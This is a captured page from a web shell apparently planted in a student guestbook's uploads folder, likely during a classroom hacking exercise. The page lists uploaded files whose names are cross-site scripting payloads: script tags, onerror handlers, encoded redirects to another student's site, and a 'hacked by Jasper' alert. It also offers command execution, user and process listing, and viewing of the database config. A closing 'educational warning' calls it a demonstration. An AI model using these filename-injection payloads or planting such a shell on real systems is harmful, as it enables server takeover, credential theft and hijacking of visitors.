🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585871.klas4s23.mid-ica.nl/public_html/gastenboekv2/uploads

📄 %22%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%22%68%74%74%70%3a%2f%2f%35%38%35%39%39%37%2e%6b%6c%61%73%34%73%32%33%2e%6d%69%64%2d%69%63%61%2e%6e%6c%2f%22%3b%3c%2f%73%63%72%69%70%74%3e.png [view]
📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📄 ' onerror='window.location.replace(`%68%74%74%70%3a%2f%2f%35%38%35%39%39%37%2e%6b%6c%61%73%34%73%32%33%2e%6d%69%64%2d%69%63%61%2e%6e%6c%2f`)'.png [view]
📄 ' onerror='window.location.replace(`..`)'.png [view]
📄 ' onerror='window.location.replace(`585997.klas4s23.mid-ica.nl`)'.png [view]
📄 ' onerror='window.location.replace(`https%3A%2F%2F585997.klas4s23.mid-ica.nl`)'.png [view]
📄 '><script>alert(1).png [view]
📁 ..
📄 Cat pro%22file.png [view]
📄 Cat profile.png [view]
📄 Cat profile.png`)'.png [view]
📄 IMG-20231018-WA0000.jpg [view]
📄 Screenshot 2024-08-03 232548.png [view]
📄 Tux.svg.png [view]
📄 `)'.png [view]
📄 fake_photo.png [view]
📄 notcat.png [view]
📄 script>.png [view]
📄 sneaky.png [view]
📄 test.php'>.png [view]
📄 testjasper3.png [view]
📄 th.jpg [view]
📄 xss_attack.gif [view]

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!